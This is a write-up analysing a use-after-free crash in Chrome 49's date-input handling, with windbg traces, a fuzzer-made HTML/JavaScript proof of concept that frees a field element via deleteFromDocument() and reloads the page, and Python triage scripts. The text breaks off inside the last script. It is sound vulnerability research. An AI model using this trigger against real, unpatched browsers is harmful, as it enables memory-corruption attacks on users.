Recently we found an interesting case in Chrome 49 stable. After reducing the POC, I submitted it to bugs.chromium.org as issue 603129, but unfortunately Chrome 50 stable was released the next day, and the bug does not reproduce in Chrome 50. tkent, a member of the Chrome team, marked the case as "WontFix", saying: "Since Google Chrome 50, Blink uses garbage collection instead of reference counting. So, use-after-free rarely happens in Blink." So I decided to analyse the case and share it with the community.

Start Chrome 49 under windbg and load the POC; Chrome 49 stable crashes:

(6c4.d00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=1484aa05 ebx=05a90530 ecx=05aa9294 edx=00000007 esi=0025e764 edi=00000001
eip=5fccac63 esp=0025e740 ebp=0025e750 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65:
5fccac63 ff9038020000 call dword ptr [eax+238h] ds:0023:1484ac3d=????????

3:031> k
ChildEBP RetAddr 
0025e750 5f610049 chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\shadow\datetimeeditelement.cpp - 814 
0025e788 5f5c27cc chrome_child!blink::BaseMultipleFieldsDateAndTimeInputType::saveFormControlState+0x58 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\forms\basemultiplefieldsdateandtimeinputtype.cpp - 489 
0025e794 5f226a83 chrome_child!blink::HTMLInputElement::saveFormControlState+0x14 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\htmlinputelement.cpp - 544 
0025e7e8 5ef97276 chrome_child!blink::DocumentState::toStateVector+0x181 c:\b\build\slave\win\build\src\third_party\webkit\source\core\html\forms\formcontroller.cpp - 431 
0025e808 5ef9723b chrome_child!blink::HistoryItem::documentState+0x1a c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\historyitem.cpp - 144 
0025e810 5ef96c93 chrome_child!blink::WebHistoryItem::documentState+0xa c:\b\build\slave\win\build\src\third_party\webkit\source\web\webhistoryitem.cpp - 129 
0025e8dc 5ef96a48 chrome_child!content::`anonymous namespace'::GenerateFrameStateFromItem+0x1cb c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 101 
0025e900 5ef968d1 chrome_child!content::`anonymous namespace'::RecursivelyGenerateFrameState+0x18 c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 122 
0025ea44 5ef93d3e chrome_child!content::HistoryEntryToPageState+0x3c c:\b\build\slave\win\build\src\content\renderer\history_serialization.cc - 182 
0025ea88 5ef9333b chrome_child!content::RenderViewImpl::SendUpdateState+0x78 c:\b\build\slave\win\build\src\content\renderer\render_view_impl.cc - 1521 
0025eccc 5ee90a89 chrome_child!content::RenderFrameImpl::didCommitProvisionalLoad+0x235 c:\b\build\slave\win\build\src\content\renderer\render_frame_impl.cc - 3131 
0025ecf0 5ee1fd87 chrome_child!blink::FrameLoaderClientImpl::dispatchDidCommitLoad+0x92 c:\b\build\slave\win\build\src\third_party\webkit\source\web\frameloaderclientimpl.cpp - 492 
0025ed70 5ee0b6b8 chrome_child!blink::FrameLoader::receivedFirstData+0xbb c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\frameloader.cpp - 429 
0025edf8 5ee0b4bd chrome_child!blink::DocumentLoader::ensureWriter+0x114 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 521 
0025ee78 5ef92276 chrome_child!blink::DocumentLoader::commitData+0x25 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 527 
0025eea8 5ef92166 chrome_child!blink::DocumentLoader::processData+0x89 c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 597 
0025eed4 5ee9abb8 chrome_child!blink::DocumentLoader::dataReceived+0x5e c:\b\build\slave\win\build\src\third_party\webkit\source\core\loader\documentloader.cpp - 575 
0025ef14 5ee9a73e chrome_child!blink::RawResource::appendData+0xa8 c:\b\build\slave\win\build\src\third_party\webkit\source\core\fetch\rawresource.cpp - 101 
0025ef38 5ee9a67b chrome_child!blink::ResourceLoader::didReceiveData+0x84 c:\b\build\slave\win\build\src\third_party\webkit\source\core\fetch\resourceloader.cpp - 424 
0025ef5c 5ee9a4a2 chrome_child!content::WebURLLoaderImpl::Context::OnReceivedData+0x64 c:\b\build\slave\win\build\src\content\child\web_url_loader_impl.cc - 700 
0025efc4 5ee9a2ff chrome_child!content::ResourceDispatcher::OnReceivedData+0x1a0 c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 290 
0025efe0 5ee9a227 chrome_child!base::DispatchToMethodImpl<content::ResourceDispatcher,void (__thiscall content::ResourceDispatcher::*)(int,int,int,int),int,int,int,int,0,1,2,3>+0x2e c:\b\build\slave\win\build\src\base\tuple.h - 252 
0025f00c 5ee939a8 chrome_child!ResourceMsg_DataReceived::Dispatch<content::ResourceDispatcher,content::ResourceDispatcher,void,void (__thiscall content::ResourceDispatcher::*)(int,int,int,int)>+0x2e c:\b\build\slave\win\build\src\content\common\resource_messages.h - 366 
0025f0d8 5ed6b1c5 chrome_child!content::ResourceDispatcher::DispatchMessageW+0x24b c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 554 
0025f100 5ee9372e chrome_child!content::ResourceDispatcher::OnMessageReceived+0xae c:\b\build\slave\win\build\src\content\child\resource_dispatcher.cc - 123 
0025f110 5ee84ae4 chrome_child!content::`anonymous namespace'::DispatchMessageTask::run+0x2e c:\b\build\slave\win\build\src\content\child\resource_scheduling_filter.cc - 31 
0025f118 5ee84ac3 chrome_child!scheduler::WebTaskRunnerImpl::runTask+0xb c:\b\build\slave\win\build\src\components\scheduler\child\web_task_runner_impl.cc - 50 
0025f124 5ee84a9f chrome_child!base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>::Run+0x11 c:\b\build\slave\win\build\src\base\bind_internal.h - 157 
0025f130 5ee84a83 chrome_child!base::internal::InvokeHelper<0,void,base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,base::internal::TypeList<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >::MakeItSo+0x17 c:\b\build\slave\win\build\src\base\bind_internal.h - 298 
0025f144 5ed69f55 chrome_child!base::internal::Invoker<base::IndexSequence<0>,base::internal::BindState<base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,void __cdecl(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >),base::internal::PassedWrapper<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >,base::internal::TypeList<base::internal::UnwrapTraits<base::internal::PassedWrapper<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > > >,base::internal::InvokeHelper<0,void,base::internal::RunnableAdapter<void (__cdecl*)(scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> >)>,base::internal::TypeList<scoped_ptr<blink::WebTaskRunner::Task,std::default_delete<blink::WebTaskRunner::Task> > > >,void __cdecl(void)>::Run+0x19 c:\b\build\slave\win\build\src\base\bind_internal.h - 350 
0025f1a4 5edf1183 chrome_child!base::debug::TaskAnnotator::RunTask+0x130 c:\b\build\slave\win\build\src\base\debug\task_annotator.cc - 51 
0025f250 5edf0400 chrome_child!scheduler::TaskQueueManager::ProcessTaskFromWorkQueue+0x1b1 c:\b\build\slave\win\build\src\components\scheduler\base\task_queue_manager.cc - 268 
0025f37c 5edf0304 chrome_child!scheduler::TaskQueueManager::DoWork+0xf8 c:\b\build\slave\win\build\src\components\scheduler\base\task_queue_manager.cc - 180 
0025f398 5edf02bc chrome_child!base::internal::InvokeHelper<1,void,base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,base::internal::TypeList<base::WeakPtr<scheduler::TaskQueueManager> const &,base::TimeTicks const &,bool const &> >::MakeItSo+0x42 c:\b\build\slave\win\build\src\base\bind_internal.h - 307 
0025f3b4 5ed69f55 chrome_child!base::internal::Invoker<base::IndexSequence<0,1,2>,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,void __cdecl(scheduler::TaskQueueManager *,base::TimeTicks,bool),base::WeakPtr<scheduler::TaskQueueManager>,base::TimeTicks,bool>,base::internal::TypeList<base::internal::UnwrapTraits<base::WeakPtr<scheduler::TaskQueueManager> >,base::internal::UnwrapTraits<base::TimeTicks>,base::internal::UnwrapTraits<bool> >,base::internal::InvokeHelper<1,void,base::internal::RunnableAdapter<void (__thiscall scheduler::TaskQueueManager::*)(base::TimeTicks,bool)>,base::internal::TypeList<base::WeakPtr<scheduler::TaskQueueManager> const &,base::TimeTicks const &,bool const &> >,void __cdecl(void)>::Run+0x25 c:\b\build\slave\win\build\src\base\bind_internal.h - 350 
0025f410 5ed69d5f chrome_child!base::debug::TaskAnnotator::RunTask+0x130 c:\b\build\slave\win\build\src\base\debug\task_annotator.cc - 51 
0025f47c 5ed69b52 chrome_child!base::MessageLoop::RunTask+0x185 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 488 
0025f5b0 5ed6bcfe chrome_child!base::MessageLoop::DoWork+0x478 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 608 
0025f5dc 5ed69620 chrome_child!base::MessagePumpDefault::Run+0xc6 c:\b\build\slave\win\build\src\base\message_loop\message_pump_default.cc - 34 
0025f600 5ed69528 chrome_child!base::MessageLoop::RunHandler+0x65 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 451 
0025f628 5ed69422 chrome_child!base::RunLoop::Run+0x89 c:\b\build\slave\win\build\src\base\run_loop.cc - 57 
0025f650 5edb854c chrome_child!base::MessageLoop::Run+0x22 c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc - 294 
0025f7e8 5ed616f4 chrome_child!content::RendererMain+0x368 c:\b\build\slave\win\build\src\content\renderer\renderer_main.cc - 234 
0025f7fc 5ed61670 chrome_child!content::RunNamedProcessTypeMain+0x61 c:\b\build\slave\win\build\src\content\app\content_main_runner.cc - 382 
0025f848 5ed47d8b chrome_child!content::ContentMainRunnerImpl::Run+0x5f c:\b\build\slave\win\build\src\content\app\content_main_runner.cc - 787 
0025f858 5ed47a6f chrome_child!content::ContentMain+0x23 c:\b\build\slave\win\build\src\content\app\content_main.cc - 19 
*** ERROR: Symbol file could not be found. Defaulted to export symbols for chrome.exe - 
0025f898 00d67e6b chrome_child!ChromeMain+0x61 c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc - 70 
WARNING: Stack unwind information not available. Following frames may be wrong.
0025f978 00d67416 chrome!GetUploadedReportsImpl+0xbf9
0025faac 00da3e1a chrome!GetUploadedReportsImpl+0x1a4
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll - 
0025faf8 75f2ee1c chrome!IsSandboxedProcess+0x31c12
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 
0025fb04 77153a03 kernel32!BaseThreadInitThunk+0x12
0025fb44 771539d6 ntdll!RtlInitializeExceptionChain+0xef
0025fb5c 00000000 ntdll!RtlInitializeExceptionChain+0xc2

3:031> lmvm chrome_child
start end module name
5ed40000 61817000 chrome_child (private pdb symbols) c:\symbols\chrome_child.dll.pdb\ED5E5CDDD59F46E99F980CAB8DDBC4141\chrome_child.dll.pdb
 Loaded symbol image file: C:\Program Files\Google\Chrome\Application\49.0.2623.112\chrome_child.dll
 Image path: C:\Program Files\Google\Chrome\Application\49.0.2623.112\chrome_child.dll
 Image name: chrome_child.dll
 Timestamp: Wed Apr 06 08:29:27 2016 (57045867)
 CheckSum: 02981495
 ImageSize: 02AD7000
 File version: 49.0.2623.112
 Product version: 49.0.2623.112
 File flags: 0 (Mask 17)
 File OS: 4 Unknown Win32
 File type: 1.0 App
 File date: 00000000.00000000
 Translations: 0409.04b0
 CompanyName: Google Inc.
 ProductName: Google Chrome
 InternalName: chrome_dll
 OriginalFilename: chrome.dll
 ProductVersion: 49.0.2623.112
 FileVersion: 49.0.2623.112
 FileDescription: Google Chrome
 LegalCopyright: Copyright 2015 Google Inc. All rights reserved.

Since this bug was found in Chrome version 49.0.2623.112, we can review the code for that tag on chromium.googlesource.com:

https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112

The code around the crash point, DateTimeEditElement::valueAsDateTimeFieldsState, is in DateTimeEditElement.cpp:

(https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112/third_party/WebKit/Source/core/html/shadow/DateTimeEditElement.cpp)

m_fields is defined in DateTimeEditElement.h; it is a list of DateTimeFieldElement objects:

(https://chromium.googlesource.com/chromium/src.git/+/49.0.2623.112/third_party/WebKit/Source/core/html/shadow/DateTimeEditElement.h)

Now we know this is a UAF of a DateTimeFieldElement. Since it is an Element object, we can set a breakpoint on the Element destructor in windbg to observe the release of every Element object:

 bp chrome_child!blink::Element::~Element "r;k;g" 

Reload the POC and wait for the crash. Then search the windbg output for the value of ECX at the crash (under __thiscall, ECX is the this pointer when ~Element runs); the matching breakpoint hit gives the call stack that released the object:

eax=00000001 ebx=078153b0 ecx=078a9294 edx=0500776c esi=078a9294 edi=0500776c
eip=6459d342 esp=0027e4e0 ebp=0027e4e8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
chrome_child!blink::Element::~Element:
6459d342 51 push ecx
ChildEBP RetAddr 
0027e4dc 655448f9 chrome_child!blink::Element::~Element c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\element.cpp @ 171 
0027e4e8 6459c714 chrome_child!blink::DateTimeMonthFieldElement::`scalar deleting destructor'+0xb
0027e4f4 6453b654 chrome_child!blink::Node::removedLastRef+0x4a c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\node.cpp @ 2192 
0027e500 64c83d67 chrome_child!WTF::VectorDestructor<1,WTF::RefPtr<blink::Node> >::destruct+0x31 c:\b\build\slave\win\build\src\third_party\webkit\source\wtf\vector.h @ 70 
0027e56c 64c8339f chrome_child!blink::Range::processContents+0x668 c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\range.cpp @ 600 
0027e584 64db60a0 chrome_child!blink::Range::deleteContents+0x55 c:\b\build\slave\win\build\src\third_party\webkit\source\core\dom\range.cpp @ 392 
0027e5e0 65043dfd chrome_child!blink::DOMSelection::deleteFromDocument+0x90 c:\b\build\slave\win\build\src\third_party\webkit\source\core\editing\domselection.cpp @ 460 
0027e5e8 65043e62 chrome_child!blink::DOMSelectionV8Internal::deleteFromDocumentMethod+0x35 c:\b\build\slave\win\build\src\out\release\gen\blink\bindings\core\v8\v8selection.cpp @ 515 
0027e5f4 6466a825 chrome_child!blink::DOMSelectionV8Internal::deleteFromDocumentMethodCallback+0x41 c:\b\build\slave\win\build\src\out\release\gen\blink\bindings\core\v8\v8selection.cpp @ 522 
0027e628 6466a582 chrome_child!v8::internal::FunctionCallbackArguments::Call+0x7e c:\b\build\slave\win\build\src\v8\src\arguments.cc @ 34 
0027e6a8 6466a22d chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper<0>+0x310 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3487 
0027e6d0 6466a1f6 chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x30 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3510 
0027e784 6462f8e3 chrome_child!v8::internal::Builtin_HandleApiCall+0x14 c:\b\build\slave\win\build\src\v8\src\builtins.cc @ 3506 
0027e7d8 6462f7fd chrome_child!v8::internal::`anonymous namespace'::Invoke+0xda c:\b\build\slave\win\build\src\v8\src\execution.cc @ 99 
0027e820 646b8ffe chrome_child!v8::internal::Execution::Call+0x24b c:\b\build\slave\win\build\src\v8\src\execution.cc @ 164 
0027e864 646b8da1 chrome_child!v8::Function::Call+0x130 c:\b\build\slave\win\build\src\v8\src\api.cc @ 4388 
0027e8f8 646ed9f8 chrome_child!blink::V8ScriptRunner::callFunction+0x1b3 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8scriptrunner.cpp @ 441 
0027e928 6487935c chrome_child!blink::ScriptController::callFunction+0x48 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\scriptcontroller.cpp @ 153 
0027e950 646ba29d chrome_child!blink::V8LazyEventListener::callListenerFunction+0xa5 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8lazyeventlistener.cpp @ 100 
0027e9dc 646f00a0 chrome_child!blink::V8AbstractEventListener::invokeEventHandler+0x154 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8abstracteventlistener.cpp @ 139 
0027ea1c 646b992c chrome_child!blink::V8AbstractEventListener::handleEvent+0xc0 c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\core\v8\v8abstracteventlistener.cpp @ 100 

(584.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14848a07 ebx=07890530 ecx=078a9294 edx=00000007 esi=0027ea6c edi=00000001
eip=653dac63 esp=0027ea48 ebp=0027ea58 iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010293
chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65:
653dac63 ff9038020000 call dword ptr [eax+238h] ds:0023:14848c3f=????????
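
Searching the windbg output for the crash ECX by hand works once, but the "r;k;g" breakpoint fires for every Element release, so the log gets long. The script below is an added example for this write-up, not part of the original post: it parses such a log, finds the crash, walks back to the last destructor hit whose this pointer (ECX) equals the ECX at the crash, and reports the most-derived class from the `scalar deleting destructor' frame. SAMPLE_LOG is constructed from the register and stack values shown above, with an unrelated HTMLDivElement release added in front and shortened source paths.

```python
"""Correlate a windbg crash with the Element destructor breakpoint hit that freed
the same object (log format approximates `bp ... "r;k;g"` output; see lead-in)."""
import re
from dataclasses import dataclass, field

# First line printed by `r`: ecx is `this` for the __thiscall ~Element breakpoint
REG_LINE = re.compile(r"^eax=[0-9a-f]{8} ebx=[0-9a-f]{8} ecx=(?P<ecx>[0-9a-f]{8})")
# A `k` frame: ChildEBP RetAddr Symbol [source path]; the path is stripped
FRAME_LINE = re.compile(r"^[0-9a-f]{8} [0-9a-f]{8} (?P<sym>\S.*?)(?:\s+[a-z]:\\.*)?\s*$", re.I)
ACCESS_VIOLATION = re.compile(r"Access violation - code c0000005")
# MSVC names the most-derived destructor frame `scalar deleting destructor'
DELETING_DTOR = re.compile(r"!(?P<cls>[\w:]+)::`scalar deleting destructor'")


@dataclass
class Hit:
    kind: str                  # "dtor" for a breakpoint hit, "crash" for the exception
    ecx: str
    frames: list = field(default_factory=list)


def parse_windbg_log(text):
    """Split the log into breakpoint hits and the crash, each with its stack frames."""
    hits, current, pending_crash = [], None, False
    for line in text.splitlines():
        if ACCESS_VIOLATION.search(line):
            pending_crash = True        # the next register dump belongs to the crash
            continue
        m = REG_LINE.match(line)
        if m:
            current = Hit("crash" if pending_crash else "dtor", m.group("ecx"))
            pending_crash = False
            hits.append(current)
            continue
        m = FRAME_LINE.match(line)
        if m and current is not None:
            current.frames.append(m.group("sym"))
    return hits


def find_free_site(text):
    """Return (crash, destructor hit with the same `this`); either may be None."""
    hits = parse_windbg_log(text)
    crash = next((h for h in hits if h.kind == "crash"), None)
    if crash is None:
        return None, None
    # Walk backwards: the last release of that address before the crash is the one that matters
    for h in reversed(hits):
        if h.kind == "dtor" and h.ecx == crash.ecx:
            return crash, h
    return crash, None


def freed_type(hit):
    """Most-derived class of the freed object, taken from the deleting-destructor frame."""
    for f in hit.frames:
        m = DELETING_DTOR.search(f)
        if m:
            return m.group("cls")
    return None


# Constructed log (values from the write-up, paths shortened), not a real capture
SAMPLE_LOG = r"""
eax=00000001 ebx=078153b0 ecx=05aa1230 edx=0500776c esi=05aa1230 edi=0500776c
chrome_child!blink::Element::~Element:
6459d342 51 push ecx
ChildEBP RetAddr
0027e4dc 655448f9 chrome_child!blink::Element::~Element c:\src\core\dom\element.cpp @ 171
0027e4e8 6459c714 chrome_child!blink::HTMLDivElement::`scalar deleting destructor'+0xb
0027e4f4 6453b654 chrome_child!blink::Node::removedLastRef+0x4a c:\src\core\dom\node.cpp @ 2192
eax=00000001 ebx=078153b0 ecx=078a9294 edx=0500776c esi=078a9294 edi=0500776c
chrome_child!blink::Element::~Element:
6459d342 51 push ecx
ChildEBP RetAddr
0027e4dc 655448f9 chrome_child!blink::Element::~Element c:\src\core\dom\element.cpp @ 171
0027e4e8 6459c714 chrome_child!blink::DateTimeMonthFieldElement::`scalar deleting destructor'+0xb
0027e4f4 6453b654 chrome_child!blink::Node::removedLastRef+0x4a c:\src\core\dom\node.cpp @ 2192
0027e500 64c83d67 chrome_child!WTF::VectorDestructor<1,WTF::RefPtr<blink::Node> >::destruct+0x31 c:\src\wtf\vector.h @ 70
0027e56c 64c8339f chrome_child!blink::Range::processContents+0x668 c:\src\core\dom\range.cpp @ 600
0027e584 64db60a0 chrome_child!blink::Range::deleteContents+0x55 c:\src\core\dom\range.cpp @ 392
0027e5e0 65043dfd chrome_child!blink::DOMSelection::deleteFromDocument+0x90 c:\src\core\editing\domselection.cpp @ 460
(584.934): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
eax=14848a07 ebx=07890530 ecx=078a9294 edx=00000007 esi=0027ea6c edi=00000001
chrome_child!blink::DateTimeEditElement::valueAsDateTimeFieldsState+0x65:
653dac63 ff9038020000 call dword ptr [eax+238h] ds:0023:14848c3f=????????
"""

if __name__ == "__main__":
    crash, hit = find_free_site(SAMPLE_LOG)
    print("crash ecx =", crash.ecx)
    if hit is None:
        print("no destructor hit matches the crash ecx")
    else:
        print("freed type:", freed_type(hit))
        for f in hit.frames:
            print("   ", f)
```

Feed it a real log with `find_free_site(open("windbg.log").read())`; because the match is on ECX only, a hit is meaningful when the freed object's type (here DateTimeMonthFieldElement) is consistent with the crashing function, which is the same sanity check the manual search relies on.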

From this call stack we learn more about the bug: it is a DateTimeMonthFieldElement UAF, and the DateTimeMonthFieldElement object was deleted by DOMSelection::deleteFromDocument. Let's look at the POC to see what happened:

<!DOCTYPE html>
<html>
<head id="head">
 <meta charset="utf-8" id="meta1">
 <meta http-equiv="Cache-Control" content="no-cache" id="meta2">
 <title id="title">cm45.eng.1.0.001.js -> cm45.1.0.001.php: 20160316_185920</title>
 <style id="style">

 </style>
 <script src="#" type="text/javascript" id="s1"></script>
 <script src="#" type="text/javascript" id="s2"></script>
 <script src="#" type="text/javascript" id="s3"></script>
 <script src="#" type="text/javascript" id="s4"></script>
 <script type="text/javascript" id="s5">

 function xlab_fuzzing() {
     g_ele_ref_son = null;
     g_ele_ref_parent = null;
     g_element_list = [];
     g_ele_ref_son = document.all[12];
     g_ele_ref_son.addEventListener("DOMSubtreeModified", function(){
         window.g_ele_ref_son = document.all[45 % document.all.length];
         g_ele_ref_son.parentElement.innerHTML = "<table><td colspan=10></td></table>";
     }, true);
     g_ele_ref_son = document.all[40]
     g_ele_ref_son.addEventListener("DOMNodeRemoved", function () {
         window.ele_call_target = document.all[93 % document.all.length];
         ele_call_target.setRangeText(15);
     }, false);
     g_ele_ref_son.addEventListener("DOMSubtreeModified", function () {
         var ele_input_list = document.getElementsByTagName("input");
         window.ele_input_target = ele_input_list[23 % ele_input_list.length];
         ele_input_target.type = 'date';
         window.ele_input_target = ele_input_list[88 % ele_input_list.length];
     }, false);
     g_ele_ref_son = document.createElement('form');
     g_element_list.push(g_ele_ref_son);
     g_ele_ref_parent = document.body;
     var ele = g_ele_ref_parent.cloneNode(true);
     document.body.appendChild(g_ele_ref_son);
     g_ele_ref_son.appendChild(ele);
     window.ele_call_target = document.all[58 % document.all.length];
     ele_call_target.remove('', document.all[335 % document.all.length]);
     g_ele_ref_son = document.createElement('layer');
     g_ele_ref_parent.insertAdjacentElement("afterEnd", g_ele_ref_son);
     g_ele_ref_son = document.createElement('b');
     g_ele_ref_parent.insertAdjacentHTML("afterEnd", "<iframe>");
     g_ele_ref_parent.appendChild(g_ele_ref_son);
     g_ele_ref_son = document.createElement('layer');
     document.all[46].appendChild(g_ele_ref_son);
     g_ele_ref_son = document.createElement('cite');
     g_ele_ref_parent.insertAdjacentElement("beforeBegin", g_ele_ref_son);
     g_ele_ref_son = document.createElement('layer');
     var ele = g_ele_ref_parent.cloneNode(true);
     document.body.appendChild(g_ele_ref_son);
     g_ele_ref_son.appendChild(ele);
     g_ele_ref_son.innerText="2147483649";
     g_ele_ref_son = document.createElement('layer');
     g_ele_ref_parent.appendChild(g_ele_ref_son);
     g_ele_ref_son = document.getElementsByTagName("form")[1];
     g_ele_ref_son.innerText="0";
     g_ele_ref_son.nextElementSibling.outerHTML = "<table><td colspan=10></td></table>";
     window.ele_call_target = document.all[827 % document.all.length];
     ele_call_target.appendChild(document.all[638 % document.all.length], '');
     var ele_input_list = document.getElementsByTagName("input");
     ele_input_target.type = 'image';
     window.getSelection().collapseToStart();
     document.execCommand("SelectAll");
     window.getSelection().deleteFromDocument();
     window.location.reload();
 }
 </script>

</head>

<body id="body" onload="xlab_fuzzing();">
<table>
 <caption>Monthly savings</caption>

 <colgroup>
 <col span="2" style="background-color:red">
 <col style="background-color:yellow">
 </colgroup>

 <thead>
 <tr>
 <th>Month</th>
 <th>Savings</th>
 </tr>
 </thead>
 <tfoot>
 <tr>
 <td>Sum</td>
 <td>$180</td>
 </tr>
 </tfoot>
 <tbody>
 <tr>
 <td>January</td>
 <td>$100</td>
 </tr>
 <tr>
 <td>February</td>
 <td>$80</td>
 </tr>
 </tbody>

</table>

<ol>
 <li>Coffee</li>
 <li>Tea</li>
 <li>Milk</li>
</ol>

<ul>
 <li>Coffee</li>
 <li>Tea</li>
 <li>Milk</li>
</ul>

<dl>
 <dt>Coffee</dt>
 <dd>Black hot drink</dd>
 <dt>Milk</dt>
 <dd>White cold drink</dd>
</dl>


<form>
 <label for="male">Male</label>
 <input type="tel" name="fname"><br>
 <input type="email" name="fname"><br>
 <input type="url" name="fname"><br>
 <input type="search" name="fname"><br>
 <input type="range" min="18" max="120" step="5" value="28" name="fname"><br>
 <input type="color" name="fname"><br>
 <input type="datetime" name="fname"><br>
 <input type="datetime-local" name="fname"><br>
 <input type="time" name="fname"><br>
 <input type="date" name="fname"><br>
 <input type="week" name="fname"><br>
 <input type="month" name="fname"><br>
 <input type="number" name="fname"><br>
 <input type="text" name="fname"><br>
 <input type="password" name="pwd">
 <input type="button" value="Hello world!">
 <input type="radio" name="sex" id="male" value="male"><br>
 <input type="radio" name="sex" id="female" value="female"><br>
 <input type="checkbox" name="vehicle" value="Bike">I have a bike<br>
 <input type="checkbox" name="vehicle" value="Car">I have a car
 <input type="submit" value="Submit">
 <keygen name="security"></keygen>

 <fieldset>
 <legend>Personalia:</legend>
 <input type="text" name="fname"><br>
 <input type="text" name="fname"><br>
 </fieldset>

 <input list="browsers">

 <datalist id="browsers">
 <option value="Internet Explorer">
 </option><option value="Firefox">
 </option><option value="Chrome">
 </option><option value="Opera">
 </option><option value="Safari">
 </option></datalist>

 <input type="range" id="a" value="50">
 <input type="number" id="b" value="50">
 <output name="x" for="a b"></output>
</form>

</body>
</html>

The JavaScript statements behind the DOMSelection::deleteFromDocument call are:

document.execCommand("SelectAll");
window.getSelection().deleteFromDocument();

Those two lines of JavaScript delete all elements in the DOM, including the DateTimeMonthFieldElement, but it seems Chrome still holds a reference to the DateTimeMonthFieldElement object.

When the page is reloaded by window.location.reload(), Chrome repaints the page and reuses the DateTimeMonthFieldElement freed before, but its vtable is gone: the crash above is the virtual call through [eax+238h] made on the stale object.
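
The ownership mismatch that the two paragraphs above describe, as an added model rather than Blink code: the DOM tree owns its nodes by reference count, while the edit element's m_fields list kept non-owning references to its field elements. Python's own reference counting stands in for RefPtr and a weakref stands in for the raw pointer, so the dangling entry becomes a detectable error instead of undefined behaviour; the "traced" variant models the effect of the Chrome 50 change quoted at the top, where a reference held by the editor keeps the field alive. Class and method names are this example's own.

```python
"""Refcounted DOM ownership versus a non-owning field list (model, not Blink code)."""
import weakref


class FieldElement:
    """Stand-in for DateTimeMonthFieldElement; the document holds the owning reference."""

    def __init__(self, name, value):
        self.name = name
        self.value = value


class Document:
    """The DOM tree: owns its nodes by reference count (Python's own, standing in for RefPtr)."""

    def __init__(self):
        self.nodes = []

    def append(self, node):
        self.nodes.append(node)
        return node

    def delete_from_document(self):
        # Dropping the last owning reference frees the node immediately, as
        # Node::removedLastRef did in the refcounted Blink of Chrome 49.
        self.nodes.clear()


class RawPointerEditElement:
    """Chrome 49 shape: m_fields holds non-owning references to the field elements.
    A raw pointer cannot tell that its target is gone; the weakref here can."""

    def __init__(self, fields):
        self.m_fields = [weakref.ref(f) for f in fields]

    def value_as_state(self):
        state = {}
        for ref in self.m_fields:
            f = ref()
            if f is None:
                raise RuntimeError("dangling m_fields entry: field was freed by the DOM")
            state[f.name] = f.value
        return state


class TracedEditElement:
    """Model of the Chrome 50 shape: a field the editor still references is kept
    reachable, whatever the DOM tree did with it."""

    def __init__(self, fields):
        self.m_fields = list(fields)          # owning references

    def value_as_state(self):
        return {f.name: f.value for f in self.m_fields}


def scenario(editor_cls):
    """Build a document with two fields, delete everything from it (the
    deleteFromDocument() step of the POC), then save the editor's state as the
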